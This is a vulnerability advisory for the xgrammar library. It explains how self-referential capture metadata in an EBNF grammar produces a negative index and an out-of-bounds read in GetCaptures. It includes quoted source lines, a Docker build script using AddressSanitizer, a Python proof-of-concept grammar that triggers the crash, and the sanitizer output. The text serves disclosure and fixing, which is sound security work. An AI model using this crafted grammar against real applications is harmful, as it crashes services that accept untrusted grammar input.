Out-of-Bounds Read Through Self-Referential Capture Metadata
Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730
Summary
An application that accepts untrusted EBNF grammar text can be crashed when it later materializes captures. A grammar can assign a captured rule's hidden-body helper ID to that rule itself and give it a positive hidden suffix length. If the rule is also the root rule, matching one byte records a capture start before the beginning of the parser history. GrammarMatcher::GetCaptures then uses that negative start as an unchecked std::vector index, producing an out-of-bounds read. The demonstrated impact is a process abort under AddressSanitizer; the evidence does not establish disclosure of the read value or code execution.
Detail
The failure begins at the public EBNF parser. EBNFLexer::Impl::ParseIdentifierOrBooleanToken in cpp/grammar_parser.cc accepts capture_hidden_suffix_bytes, capture_hidden_body_rule_id, and capture_hidden_marker_rule_id from the rule attribute block. It requires a positive hidden-byte value, paired body and marker IDs, and values no larger than INT32_MAX. GrammarBuilder::UpdateSuffixStopInfo then verifies that the helper IDs name existing rules. Rule ID 0 is therefore valid for both fields when the only rule is root, but neither layer verifies that a self-referencing body ID describes the internally generated zero-width marker event for which this representation was designed.
The root parser state is deliberately initialized with ParserState::kNoPrevInputPos, whose value is -1. After accept_string("a") completes the root rule, Complete calls RecordCaptureEvent with marker recording enabled. The supplied hidden suffix is positive, and body_rule_id == state.rule_id == 0, so the self-reference branch in cpp/earley_parser.cc executes:
int32_t event_start_pos = state.rule_start_pos;
if (marker_consumed && suffix_stop_info->body_rule_id == state.rule_id) {
XGRAMMAR_DCHECK(event_start_pos != ParserState::kNoPrevInputPos);
event_start_pos -= std::max(hidden_suffix_bytes, hidden_stop_bytes);
XGRAMMAR_DCHECK(event_start_pos >= 0);
}
Both guards are XGRAMMAR_DCHECK, so the default release configuration compiles them out. With the PoC values, the calculation is -1 - 1 == -2. This is not an integer overflow; it is an invalid but representable history row that is stored in CaptureEvent::start_pos. Enabling internal checks only changes the failure into an earlier diagnostic and is not a production fix.
GrammarMatcher::Impl::GetCaptures in cpp/grammar_matcher.cc converts exactly the -1 root sentinel to row zero, but preserves every other negative value:
int32_t start_row = event.start_pos == ParserState::kNoPrevInputPos ? 0 : event.start_pos;
Consequently, -2 survives in the flattened event. The debug assertion start_row <= row does not reject it because a negative number satisfies that inequality. Marker-boundary recovery then reaches the first concrete sink:
int64_t event_start = row_byte_end_[event.start_row];
std::vector::operator[] converts event.start_row to an unsigned size_type, turning -2 into a very large index and reading outside row_byte_end_. A later capture-materialization access has the same assumption, but the observed execution fails at this first read.
Triggering the sink requires all of the following: control of grammar text, a captured rule with crafted hidden metadata, input that completes that rule, and a call to get_captures(). Merely matching the input records the invalid event but does not perform the demonstrated read. Removing the positive hidden-byte attribute avoids the self-reference adjustment, and an out-of-range helper ID is already rejected by GrammarBuilder; these controls isolate the missing relationship check rather than a generic invalid-ID problem.
Reproduce
Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.
The following container recipe pins the assessed revision rather than cloning a moving branch. It builds with AddressSanitizer, disables libstdc++'s own vector assertion so that AddressSanitizer observes the underlying read, accepts one byte, and calls get_captures().
docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi pydantic transformers numpy typing-extensions
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --recursive --depth 1
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
cat > repro.py <<'PY'
import xgrammar as xgr
tokenizer = xgr.TokenizerInfo(["a"])
grammar = xgr.Grammar.from_ebnf(
'root[capture="x",capture_hidden_suffix_bytes=1,'
'capture_hidden_body_rule_id=0,capture_hidden_marker_rule_id=0] ::= "a"'
)
compiled = xgr.GrammarCompiler(
tokenizer, max_threads=1, cache_enabled=False
).compile_grammar(grammar)
matcher = xgr.GrammarMatcher(compiled)
assert matcher.accept_string("a")
matcher.get_captures()
PY
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0:disable_coredump=1 \
LD_PRELOAD="$(gcc -print-file-name=libasan.so)" \
python repro.py
DOCKER
On the assessed revision, the final call reports the following decisive signature and aborts:
ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 8
#0 xgrammar::GrammarMatcher::Impl::GetCaptures(bool) const
cpp/grammar_matcher.cc:2299
Credit
Zheng Yu @ Depthfirst